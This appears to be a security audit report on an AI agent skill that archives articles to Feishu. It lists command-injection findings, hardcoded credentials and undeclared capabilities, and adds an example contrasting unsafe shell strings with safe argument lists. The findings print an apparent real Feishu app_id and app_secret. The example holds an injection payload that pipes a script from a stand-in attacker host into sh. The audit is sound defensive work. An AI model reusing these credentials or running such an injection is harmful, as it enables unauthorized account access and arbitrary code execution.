
Security audit

Article Archiver

Security checks across malware telemetry and agentic risk

Overview

This archiver largely does what its description says, but it automatically sends any shared content to fixed Feishu destinations, ships hardcoded Feishu and Twitter/X credentials inside the package, and builds shell commands from untrusted data (URLs, page titles, article content).

Review before installing. Rotate and remove all bundled Feishu and Twitter/X credentials, confirm the Feishu destination and notification recipient, require explicit confirmation before archiving shared links, and replace the shell-string command construction with argument lists before using this on untrusted URLs or article content.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Data Exfiltration: External Transmission, Env Variable Harvesting, File System Enumeration
  • Excessive Agency: Unrestricted Tool Access, Autonomous Decision Making, Scope Creep
  • Behavioral AST: exec() Call, eval() Call, Dynamic Import
  • MCP Least Privilege: Underdeclared Capability, Wildcard Permission, Missing Permission Declaration
  • MCP Tool Poisoning: Hidden Instructions, Unicode Deception, Parameter Description Injection
Findings (69)

subprocess module call

Medium
Category
Dangerous Code Execution
Content
-d '{{"obj_type":"docx","parent_node_token":"{parent_token}","node_type":"origin","title":"{title}"}}'
'''
    
    result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    if result.returncode != 0:
        raise Exception(f"Failed to create node: {result.stderr}")
Confidence
99% confidence
Finding
result = subprocess.run(cmd, shell=True, capture_output=True, text=True)

subprocess module call

Medium
Category
Dangerous Code Execution
Content
def run_cmd(cmd):
    """Execute a command and return its output"""
    result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return result.returncode, result.stdout, result.stderr

def get_access_token():
Confidence
98% confidence
Finding
result = subprocess.run(cmd, shell=True, capture_output=True, text=True)

subprocess module call

Medium
Category
Dangerous Code Execution
Content
-d '{"app_id":"cli_a90ecd03bc399bcb","app_secret":"gdEsio0WzDtHEhHFeLS55wBseDpExVtg"}' | jq -r '.tenant_access_token'
'''
    
    result = subprocess.run(token_cmd, shell=True, capture_output=True, text=True)
    if result.returncode != 0:
        raise Exception(f"Failed to get token: {result.stderr}")
Confidence
95% confidence
Finding
result = subprocess.run(token_cmd, shell=True, capture_output=True, text=True)

subprocess module call

Medium
Category
Dangerous Code Execution
Content
-d '{{"obj_type":"docx","parent_node_token":"{parent_token}","node_type":"origin","title":"{title_escaped}"}}'
'''
    
    result = subprocess.run(create_cmd, shell=True, capture_output=True, text=True)
    if result.returncode != 0:
        raise Exception(f"Failed to create node: {result.stderr}")
Confidence
99% confidence
Finding
result = subprocess.run(create_cmd, shell=True, capture_output=True, text=True)

subprocess module call

Medium
Category
Dangerous Code Execution
Content
# Call the CLI
        cmd = f'openclaw feishu-doc upload-image --doc-token "{doc_token}" --file-path "{image_path}"'
        result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
        
        sys.exit(result.returncode)
Confidence
99% confidence
Finding
result = subprocess.run(cmd, shell=True, capture_output=True, text=True)

subprocess module call

Medium
Category
Dangerous Code Execution
Content
# Call the CLI
        cmd = f'openclaw feishu-doc {action} --doc-token "{doc_token}" --content "{content_escaped}"'
        result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
        
        sys.exit(result.returncode)
Confidence
98% confidence
Finding
result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
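The shell-string pattern behind the six findings above, next to the two fixes a reviewer would ask for, as an added example; this is not code from the Article Archiver skill or from SkillSpector. It reproduces the shape of the archiver's curl invocation against a placeholder endpoint (API_URL is an assumption; the real URL is not shown on this page), constructs a sample article title that an attacker could plant in a page's title tag, and uses shlex to show that the title splits the command into several shell commands, while an argv list with shell=False (or, if a shell string is unavoidable, shlex.quote over the whole JSON body) keeps it as a single argument. The environment variable names FEISHU_APP_ID and FEISHU_APP_SECRET are likewise assumptions chosen for the example.

```python
"""Shell-string vs. argument-list command construction (added example, not the skill's code)."""
import json
import os
import shlex
import subprocess
from typing import List, Mapping, Tuple

# Assumed endpoint for illustration; the archiver's real URL is not shown on the audit page.
API_URL = "https://example.invalid/feishu/nodes"

# Constructed sample input: a page <title> as an attacker could set it. The single quote
# closes the shell's '...' string around the JSON body; everything after it is parsed by
# the shell as further commands.
MALICIOUS_TITLE = "x'; curl http://attacker.example/p | sh; echo '"


def build_unsafe_command(parent_token: str, title: str) -> str:
    """Same pattern as the archiver: untrusted text interpolated into a shell string."""
    body = ('{"obj_type":"docx","parent_node_token":"%s","node_type":"origin","title":"%s"}'
            % (parent_token, title))
    return f"curl -s -X POST {API_URL} -d '{body}'"


def shell_words(command: str) -> List[str]:
    """Split a command line the way a POSIX shell would, keeping ; | & ( ) < > as
    their own tokens so an injected command boundary is visible in the result."""
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    return list(lexer)


def build_quoted_command(parent_token: str, title: str) -> str:
    """Minimal fix when a shell string is unavoidable: serialise the body with json.dumps
    and quote the whole argument with shlex.quote. Hand-escaping a few characters (the
    title_escaped approach) is not equivalent."""
    body = json.dumps({"obj_type": "docx", "parent_node_token": parent_token,
                       "node_type": "origin", "title": title})
    return f"curl -s -X POST {API_URL} -d {shlex.quote(body)}"


def build_safe_argv(parent_token: str, title: str) -> List[str]:
    """Preferred fix: an argv list run with shell=False. Each element reaches curl as
    exactly one argument, so no byte in the title can start a new command."""
    body = json.dumps({"obj_type": "docx", "parent_node_token": parent_token,
                       "node_type": "origin", "title": title})
    return ["curl", "-s", "-X", "POST", API_URL,
            "-H", "Content-Type: application/json", "-d", body]


def parse_title(body: str) -> str:
    """Decode the JSON body an argument carries and return its title field."""
    return json.loads(body)["title"]


def load_credentials(env: Mapping[str, str] = os.environ) -> Tuple[str, str]:
    """Read the Feishu app credentials from the environment (variable names are assumed)
    instead of from source, and fail loudly when they are absent."""
    try:
        return env["FEISHU_APP_ID"], env["FEISHU_APP_SECRET"]
    except KeyError as missing:
        raise RuntimeError(f"missing credential: {missing.args[0]}") from None


def run_argv(argv: List[str]) -> subprocess.CompletedProcess:
    """Replacement for the skill's run_cmd: no shell, so no metacharacter interpretation."""
    return subprocess.run(argv, shell=False, capture_output=True, text=True)


if __name__ == "__main__":
    print("unsafe:", shell_words(build_unsafe_command("tok", MALICIOUS_TITLE)))
    print("quoted:", shell_words(build_quoted_command("tok", MALICIOUS_TITLE)))
    print("argv:  ", build_safe_argv("tok", MALICIOUS_TITLE))
```

Run the file directly to print the three token lists: the unsafe form yields `;`, `curl`, `|` and `sh` as separate shell words, the quoted and argv forms keep the whole JSON body as one argument. The argv form also removes the need for jq (parse curl's stdout with json.loads), or drop curl entirely and call the API from Python with urllib. A tenant access token passed to curl in a `-H` argument is still visible in process listings, which is the same exposure the cookie-string findings further down describe; keep it in the process that makes the HTTP request rather than in argv.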

Lp3

Medium
Category
MCP Least Privilege
Confidence
92% confidence
Finding
The skill clearly uses file reads, shell commands, network access, and writes to external services, yet no permissions are declared. This creates a transparency and policy-enforcement gap: users and the platform cannot accurately assess or constrain what the skill will do before it runs.

Tp4

High
Category
MCP Tool Poisoning
Confidence
88% confidence
Finding
The documented behavior understates the actual scope: the skill performs broader web extraction, Feishu wiki search/creation flows, and outbound notifications beyond the concise description. Behavior-description mismatch is dangerous because it prevents informed consent and can hide sensitive data handling or external side effects from users and reviewers.

Context-Inappropriate Capability

Medium
Confidence
91% confidence
Finding
The skill is designed to read a local Twitter cookie file containing authentication material. Accessing persistent local credentials from a skill increases the risk of credential leakage, misuse of an authenticated session, and unintended access to protected content.

Context-Inappropriate Capability

Medium
Confidence
98% confidence
Finding
The script constructs shell commands with untrusted input and passes them to execSync for both the Twitter fetcher invocation and the curl call. Because the URL and cookie-derived data are interpolated directly into a shell string, an attacker can trigger command injection and arbitrary local command execution, which is far more dangerous than ordinary article archiving.

Context-Inappropriate Capability

Medium
Confidence
95% confidence
Finding
The script executes a shell file from the user's home directory via `source`, which runs arbitrary local shell code with the script's privileges, not merely reads configuration data. In a skill that should only archive shared articles, this expands scope into uncontrolled local code execution and makes behavior dependent on mutable user-local state that could be tampered with.

Context-Inappropriate Capability

High
Confidence
100% confidence
Finding
The script embeds a Feishu app_id and app_secret directly in source and uses them to obtain tenant access tokens. Hardcoded production credentials are highly sensitive: anyone with code access can reuse them to access the Feishu tenant, and in this file they are combined with a shell-based API call that increases compromise risk.

Context-Inappropriate Capability

High
Confidence
99% confidence
Finding
The script embeds a Feishu app ID and app secret directly in source code, which exposes reusable credentials to anyone who can read the skill package or logs. In an agent skill context, this is especially dangerous because the skill is designed to auto-trigger and send content externally, so leaked credentials could be abused to create or modify Feishu documents outside intended workflows.

Context-Inappropriate Capability

Medium
Confidence
90% confidence
Finding
Using shell command execution as the core implementation is not inherently exploitable by itself, but here it materially increases attack surface because the skill routes article-derived data into those commands. The automation triggers immediately on shared URLs, which makes unsafe shell usage more dangerous than in a tightly controlled admin script.

Context-Inappropriate Capability

Medium
Confidence
84% confidence
Finding
The script unconditionally reads a local Twitter cookie file and uses it as an implicit credential source for processing user-supplied URLs. In this skill context, that increases danger because the skill is configured to auto-trigger on shared links without confirmation, so a user can cause credential-backed network access without any transparent consent or clear scope restriction.

Context-Inappropriate Capability

High
Confidence
99% confidence
Finding
Hardcoded Feishu app credentials are embedded directly in the script, exposing secrets to anyone with file access and enabling unauthorized API use. In this skill context, the credentials grant persistent external service access unrelated to any per-user authorization flow, increasing the risk of account abuse and data exposure.

Context-Inappropriate Capability

Medium
Confidence
94% confidence
Finding
Using shell commands with curl and jq for API access adds unnecessary command-execution capability beyond the business need of creating a Feishu document. This increases the blast radius of bugs and makes injection flaws more likely, especially since adjacent code interpolates data into shell commands.

Context-Inappropriate Capability

Medium
Confidence
94% confidence
Finding
The script explicitly requires a raw x.com cookie string as a command-line argument, parses it, and injects it into a Playwright browser context for '.x.com'. This grants the skill the ability to act with a user's authenticated session, which is broader than ordinary article archiving and creates clear risk of credential misuse, leakage via process arguments/logs, and unauthorized access to private account-bound content.

Context-Inappropriate Capability

Medium
Confidence
95% confidence
Finding
The script requires a raw x.com cookie string as a command-line argument, then injects it into a browser context for authenticated access. Command-line secrets are commonly exposed via shell history, process listings, logs, and orchestration tooling, so this creates a real credential-handling risk beyond the stated article-archiving function.

Context-Inappropriate Capability

Medium
Confidence
94% confidence
Finding
The script reads Twitter/X authentication cookies from a local file and injects them into a Playwright browser session, enabling authenticated access using preexisting credentials. Even though this is labeled as a test script, handling session cookies this way creates a credential-use capability beyond simple public article archiving and can lead to unauthorized access, account misuse, or accidental leakage of sensitive session data.

Context-Inappropriate Capability

High
Confidence
95% confidence
Finding
The fallback implementation introduces shell command execution capability even though the skill only needs to upload article images. This expands the attack surface beyond the skill's purpose and allows attacker-controlled arguments to influence command execution, making compromise more likely in an auto-triggered archiving workflow.

Description-Behavior Mismatch

High
Confidence
85% confidence
Finding
The script's behavior does not match the stated article-archiving purpose and instead performs direct document block manipulation by inserting an image into a Feishu doc. In an agent skill that is supposed to act automatically on shared links, undocumented write capabilities increase the risk of unauthorized content modification and make the skill harder for users and reviewers to trust.

Context-Inappropriate Capability

Medium
Confidence
82% confidence
Finding
Reading local image tokens from /tmp and using them to manipulate a remote document is an undeclared capability unrelated to the advertised article-archiving behavior. This creates a path for unintended or opaque data use, especially in an automated skill that users expect to process URLs rather than consume local artifacts.

Missing User Warnings

Medium
Confidence
91% confidence
Finding
The document explicitly references a persistent authentication cookie file (`config/twitter-cookies.txt`) and advises updating it when expired, but provides no warning about the sensitivity of session cookies or the risk of account takeover if they are exposed. In an agent skill that automates browsing and archiving, normalizing cookie-file handling without safeguards increases the chance that operators store, share, or log live credentials insecurely.

Missing User Warnings

Medium
Confidence
89% confidence
Finding
This section describes downloading externally hosted images, creating Feishu documents, and writing article content plus metadata into Feishu, but omits any notice that third-party content and potentially sensitive metadata will be transmitted, stored, and possibly retained outside the original source. Because the skill is configured to trigger automatically on shared URLs without confirmation, this missing disclosure makes unintended data exfiltration and privacy violations more likely.

VirusTotal

63/63 vendors flagged this skill as clean. VirusTotal checks the package against antivirus engines; it does not detect hardcoded credentials or command-injection patterns, so this result does not offset the findings above.
